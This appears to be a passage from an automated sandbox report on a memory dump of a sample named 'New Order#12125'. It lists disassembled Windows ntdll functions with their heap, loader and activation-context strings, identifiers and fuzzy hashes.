                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: 06329e5a46050cbd64d04271d3cd71499494fa52c995ffbfb29da83a5db4bb0b
                                                                        • Instruction ID: e53d7c7847037c1b250b459cc6956af4e26268482d35d6757f3871feadcc663e
                                                                        • Opcode Fuzzy Hash: 06329e5a46050cbd64d04271d3cd71499494fa52c995ffbfb29da83a5db4bb0b
                                                                        • Instruction Fuzzy Hash: 0CC17B75508382CFDB22CFA8C140B6AB7E4FF84704F04896AF9958F291E775C949CB92
                                                                        Function 01538402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • @, xrefs: 01538591
                                                                        • LdrpInitializeProcess, xrefs: 01538422
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0153855E
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01538421
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        • Opcode ID: 8447dc96470108a94d74631cd6bb4e015883918b98d61a37c71880ab405a0c8b
                                                                        • Instruction ID: 5e4717c7392627a718692ca41b91cb7c67d12374a2ff2bf88b17002a1e1d3eea
                                                                        • Opcode Fuzzy Hash: 8447dc96470108a94d74631cd6bb4e015883918b98d61a37c71880ab405a0c8b
                                                                        • Instruction Fuzzy Hash: FE919C71558346AFE722DE65DC41EABBBE8BFC4744F400A2EFA849B150E334D904CB62
                                                                        Function 01510C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • HEAP: , xrefs: 015654E0, 015655A1
                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 015654ED
                                                                        • HEAP[%wZ]: , xrefs: 015654D1, 01565592
                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 015655AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                        • API String ID: 0-1657114761
                                                                        • Opcode ID: f7ce57c44ae0946b159ff6e0c5670ca7242e1879352b6cb11b2f0c35a3a96f17
                                                                        • Instruction ID: 397b31073b6f236d95d7883f68743ba9f39332e070a786ec379c564897f7358c
                                                                        • Opcode Fuzzy Hash: f7ce57c44ae0946b159ff6e0c5670ca7242e1879352b6cb11b2f0c35a3a96f17
                                                                        • Instruction Fuzzy Hash: 01A1BF306006069FE726CF29C480BBABBF1BF55304F54856EE5968F68AD734E984CB91
                                                                        Function 0153273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015721D9, 015722B1
                                                                        • SXS: %s() passed the empty activation context, xrefs: 015721DE
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015722B6
                                                                        • .Local, xrefs: 015328D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: f42866a8a36e059cd6b0b20bb70031e411c4e030eaa3dcfaee2cebe60bb1a39d
                                                                        • Instruction ID: 7e8958a033a2a0e106669c66b58283eaccf2b74ebae5ebbd8b59b0b235c39505
                                                                        • Opcode Fuzzy Hash: f42866a8a36e059cd6b0b20bb70031e411c4e030eaa3dcfaee2cebe60bb1a39d
                                                                        • Instruction Fuzzy Hash: EDA1B13690022ADBDB25CF69D884BA9B7B1BF98354F1445EAD908AF251D7309EC1CF90
                                                                        Function 01534AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlDeactivateActivationContext, xrefs: 01573425, 01573432, 01573451
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01573437
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0157342A
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01573456
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
                                                                        • Opcode ID: 47a2fb4f58691e59d30adaeb58d2e770ea20b4eeeb51cc8b53e0a86e0fd898b6
                                                                        • Instruction ID: d5677ed13b0250eb6582529f5cc5360b22f4de8e0a7dcb3625d5efd0de2fc185
                                                                        • Opcode Fuzzy Hash: 47a2fb4f58691e59d30adaeb58d2e770ea20b4eeeb51cc8b53e0a86e0fd898b6
                                                                        • Instruction Fuzzy Hash: 8A6101366407129BD72ACF1DD85AB2AB7E6FFC0B60F14852DE8959F241DB30E801CB91
                                                                        Function 015064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0156106B
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015610AE
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01561028
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01560FE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        • API String ID: 0-1468400865
                                                                        • Opcode ID: 90cb5a36be4ff081e7078d5e14ed0a204b6c159d2876ed417752f67b763ddd25
                                                                        • Instruction ID: 71270d8013c7b424e4eac6127035e432ef8b1edbad8f95d161e0c1aff5ecf70d
                                                                        • Opcode Fuzzy Hash: 90cb5a36be4ff081e7078d5e14ed0a204b6c159d2876ed417752f67b763ddd25
                                                                        • Instruction Fuzzy Hash: 6871DFB19043469FCB22DF54C885B9B7FA8BF95764F800869F9488F286D335D588CBD1
                                                                        Function 0152245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0156A992
                                                                        • apphelp.dll, xrefs: 01522462
                                                                        • LdrpDynamicShimModule, xrefs: 0156A998
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0156A9A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-176724104
                                                                        • Opcode ID: e64dcd752d08de98543420b0f3bc417f95c1452920212c6300cc84bdaa487a8d
                                                                        • Instruction ID: 81f96493c2e03eb039f35c8be3b3c9e345ba383324afa253b3b8526e824116e2
                                                                        • Opcode Fuzzy Hash: e64dcd752d08de98543420b0f3bc417f95c1452920212c6300cc84bdaa487a8d
                                                                        • Instruction Fuzzy Hash: 40314876600202ABEB319F59D885E6E77F9FB80700F26001EE921BF295C7B05985DBC0
                                                                        Function 015129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • HEAP: , xrefs: 01513264
                                                                        • HEAP[%wZ]: , xrefs: 01513255
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0151327D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        • API String ID: 0-617086771
                                                                        • Opcode ID: 7d401f92d48663ba37c904908831b6a4ab38c38cf86fc42005c7f8b6ef1d7d80
                                                                        • Instruction ID: edb294c96f6eef3e36b9a9c62c6e333bac2c2bb1db5987482db02d1771bc6eb3
                                                                        • Opcode Fuzzy Hash: 7d401f92d48663ba37c904908831b6a4ab38c38cf86fc42005c7f8b6ef1d7d80
                                                                        • Instruction Fuzzy Hash: 3792DE71A042499FEB26CF68C450BAEBBF1FF48314F288499E859AF395D334A945CF50
                                                                        Function 015902C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                        • API String ID: 0-1670051934
                                                                        • Opcode ID: 6e55f812c14050a6257be96bf35137b536dd6337eb8e7e587fa5d5be6944ac8f
                                                                        • Instruction ID: a278628617a2add56031c8c51e3466ef5f427bbb18a9fd3d5eaccae30552e18e
                                                                        • Opcode Fuzzy Hash: 6e55f812c14050a6257be96bf35137b536dd6337eb8e7e587fa5d5be6944ac8f
                                                                        • Instruction Fuzzy Hash: D3226E726047028FDB24CF2DC59162ABBE9BBC4310F258D2EF2DA8B690D771E544CB42
                                                                        Function 01510770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: 9e303624b8c6e69a8ac074dd0be23776ff726394524374a36d7da3901e26b696
                                                                        • Instruction ID: 2ed84d5459b57e3fb9f3ee79274bc64050dc6430f302867d3cd02c35e131e3fd
                                                                        • Opcode Fuzzy Hash: 9e303624b8c6e69a8ac074dd0be23776ff726394524374a36d7da3901e26b696
                                                                        • Instruction Fuzzy Hash: 86F19A30A00606EFEB26CF68C894B6EB7F6FB84304F148569E5569F395D734E981CB90
                                                                        Function 01501460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01501728
                                                                        • HEAP: , xrefs: 01501596
                                                                        • HEAP[%wZ]: , xrefs: 01501712
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        • Opcode ID: a6d135d75830c4951065232413ea30dd3242580d7ce00fa07392063e4e64f558
                                                                        • Instruction ID: 87b4858fc3134c963e07fd975f0adf73d22bbd8e761fb7514e14129940bc97fb
                                                                        • Opcode Fuzzy Hash: a6d135d75830c4951065232413ea30dd3242580d7ce00fa07392063e4e64f558
                                                                        • Instruction Fuzzy Hash: 4BE1C430A04A459BDB26CFA8C89177ABBF1FF44304F18885EE996CF296D734E944CB51
                                                                        Function 01526962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@
                                                                        • API String ID: 0-1077428164
                                                                        • Opcode ID: 62b73e458628bdd084e231b1ac1ccb95245fe4b1cb4bd97c0789e57fff79301c
                                                                        • Instruction ID: ae1f86da234af2cce1c2665f9498ac430d37776b89086a058943cc169be2c49d
                                                                        • Opcode Fuzzy Hash: 62b73e458628bdd084e231b1ac1ccb95245fe4b1cb4bd97c0789e57fff79301c
                                                                        • Instruction Fuzzy Hash: 02C26F726083519FD725CF29C881BAFBBE5BF99754F04892DE9C98B281D734D804CB92
                                                                        Function 014FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: ee724047400dc550d7caa5067b63b1a97972084a5f6a1dfd9a7c1f2fde92b185
                                                                        • Instruction ID: 68ebee97d77d888fdf8b176b327e91f2257fdabb0c4190b6aaafa952ab6b687c
                                                                        • Opcode Fuzzy Hash: ee724047400dc550d7caa5067b63b1a97972084a5f6a1dfd9a7c1f2fde92b185
                                                                        • Instruction Fuzzy Hash: 53A18F359016299BDB71DF68CC98BAEB7B8FF44714F1101EAEA08AB250D7359E84CF50
                                                                        Function 01520BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0156A10F
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0156A121
                                                                        • LdrpCheckModule, xrefs: 0156A117
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-161242083
                                                                        • Opcode ID: f7ec5c03fd2cc7e079ab6e61a48652ca8e6fca01bf191ce81285d3060da7bfe6
                                                                        • Instruction ID: b72ffacc7b093ea885244bb3021682c4ad4d1e03fa15ca10c1744570abba4a83
                                                                        • Opcode Fuzzy Hash: f7ec5c03fd2cc7e079ab6e61a48652ca8e6fca01bf191ce81285d3060da7bfe6
                                                                        • Instruction Fuzzy Hash: 2F7102B1A00206DFDB25EF68C980ABEB7F4FB84304F15442DE412EF295E730A945DB90
                                                                        Function 01510A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: ab8709f63e2fa4489e1b33bc3204fd1a5a693dd5bbda44fb308f9e0bd389da71
                                                                        • Instruction ID: 1cde40f18d89a614e56d323614dbaec07166b26353f445d8a6ee717db54586cb
                                                                        • Opcode Fuzzy Hash: ab8709f63e2fa4489e1b33bc3204fd1a5a693dd5bbda44fb308f9e0bd389da71
                                                                        • Instruction Fuzzy Hash: 4B61AF71610306DFEB2ACF28C480B6ABBE5FF45704F14855EE4598F296D7B0E881CB91
                                                                        Function 0153C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 015782DE
                                                                        • Failed to reallocate the system dirs string !, xrefs: 015782D7
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 015782E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        • Opcode ID: 455b54738e869ee4c588b83830c935f093baefbd47798be41433b87b20e10af4
                                                                        • Instruction ID: 36463eef7052cc429f9bd8e0f40a32d0ce111dad580a8df06805174f2c31ad41
                                                                        • Opcode Fuzzy Hash: 455b54738e869ee4c588b83830c935f093baefbd47798be41433b87b20e10af4
                                                                        • Instruction Fuzzy Hash: C241F071540302ABD722EB68D845B5F77E8BF84650F11492EF954EF2A0EB70E804CB91
                                                                        Function 015BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015BC1C5
                                                                        • PreferredUILanguages, xrefs: 015BC212
                                                                        • @, xrefs: 015BC1F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: 3b8d346764ad5c8c61c6906e4f896a998adcc25db2e1d827178c7cf8e299eb14
                                                                        • Instruction ID: 0b3c14413a14a755c163598a8ac915620590d7e6f908fb425730cd2fc0f905d2
                                                                        • Opcode Fuzzy Hash: 3b8d346764ad5c8c61c6906e4f896a998adcc25db2e1d827178c7cf8e299eb14
                                                                        • Instruction Fuzzy Hash: 3A418371E0021AEBEF11DBD8C891FEEFBB8BB54704F14406AE649FB250D7749A448B54
                                                                        Function 01594144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: 310165162ba1188b2af3bde4be83429952eace7ec2b9f6972d8a7ef1f87d0c7a
                                                                        • Instruction ID: e20500bf8edcc87389da3d9c0ce27b182a25c90fbfb188259526216fb8616965
                                                                        • Opcode Fuzzy Hash: 310165162ba1188b2af3bde4be83429952eace7ec2b9f6972d8a7ef1f87d0c7a
                                                                        • Instruction Fuzzy Hash: 0041F171A006598BEF22DBE8CA40BADBBF9FF95350F14049AD901AF391D7348D02CB12
                                                                        Function 01584755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01584899
                                                                        • LdrpCheckRedirection, xrefs: 0158488F
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01584888
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        • Opcode ID: c05586946b25dae610c1dbdc7d675d927093346f489f794b039fb611ffd22c89
                                                                        • Instruction ID: 64967b58a10cc7451bf808168893516251135018524fd84e0525dc3ea9145a24
                                                                        • Opcode Fuzzy Hash: c05586946b25dae610c1dbdc7d675d927093346f489f794b039fb611ffd22c89
                                                                        • Instruction Fuzzy Hash: 2641B032A246529BDB21FE58D840B2A7BE4BF89A50B06056DED58FF215E730E801CF91
                                                                        Function 01510BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        • Opcode ID: 7eb4ed6d5b9d449c1c4d2cfd3889eb2a10330c217502d95cea09a833719d732f
                                                                        • Instruction ID: 721536f787f4a508e5821423f52f3516a512076b187f59a8ffdb7cef8913d681
                                                                        • Opcode Fuzzy Hash: 7eb4ed6d5b9d449c1c4d2cfd3889eb2a10330c217502d95cea09a833719d732f
                                                                        • Instruction Fuzzy Hash: 9411D2313651029FEB1ACA19C450F6EB3A8FF41656F28855EF406CF2A5EB38D885C790
                                                                        Function 015820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpInitializationFailure, xrefs: 015820FA
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 015820F3
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01582104
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        • Opcode ID: 66773ad12eaa3069419e914033dff96f8f1a95de30b3eccf184fe765d25b118e
                                                                        • Instruction ID: 7cc6edbe085914a6f6f23f81b65b0947a3495d46503994690fa2075aa75697d8
                                                                        • Opcode Fuzzy Hash: 66773ad12eaa3069419e914033dff96f8f1a95de30b3eccf184fe765d25b118e
                                                                        • Instruction Fuzzy Hash: 63F0C275680309ABE724F64DDC47F993BACFB80B98F61005EF640BF691D6F0AA44C691
                                                                        Function 015103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        • Opcode ID: d9cc2b6a10b4cf58fd5eca5d43ff0883da684b048557b93b02708e95c613139b
                                                                        • Instruction ID: 79134fe82be317f0b296f998786fa2fcdbc5d2c8716792d887cca057bfb4dc5b
                                                                        • Opcode Fuzzy Hash: d9cc2b6a10b4cf58fd5eca5d43ff0883da684b048557b93b02708e95c613139b
                                                                        • Instruction Fuzzy Hash: 74715C71A0014A9FDB02DFA8C994BAEB7F8FF58744F144065E905EB295EA34ED41CBA0
                                                                        Function 015152A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@
                                                                        • API String ID: 0-149943524
                                                                        • Opcode ID: a147067b2a0c4f61e1eb6de3039b6ab2a14dae24df54fb1659ad25a00fab55cf
                                                                        • Instruction ID: 01f5ddde6a6305e4ab18d90c32ee754af367fbcb51d3299263643f2cc7a71a6b
                                                                        • Opcode Fuzzy Hash: a147067b2a0c4f61e1eb6de3039b6ab2a14dae24df54fb1659ad25a00fab55cf
                                                                        • Instruction Fuzzy Hash: 0B328B745183528BE7268F18C490B3EBBE5BFC6754F14491EFA858F298E774D880CB92
                                                                        Function 0150A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrResSearchResource Exit, xrefs: 0150AA25
                                                                        • LdrResSearchResource Enter, xrefs: 0150AA13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        • Opcode ID: 52066957ae50e843f49d15101bcfc49b2b80559e4caf2c3fc4874022f3d430a5
                                                                        • Instruction ID: d089b9e06318a61969452adc5b38a7e8296f96bb51f43c8bb9c56fd459b54ef8
                                                                        • Opcode Fuzzy Hash: 52066957ae50e843f49d15101bcfc49b2b80559e4caf2c3fc4874022f3d430a5
                                                                        • Instruction Fuzzy Hash: 8AE14D71E00719ABEF22CED9C980BAEBBB9BF44310F144926E915EF2D1D7749941CB90
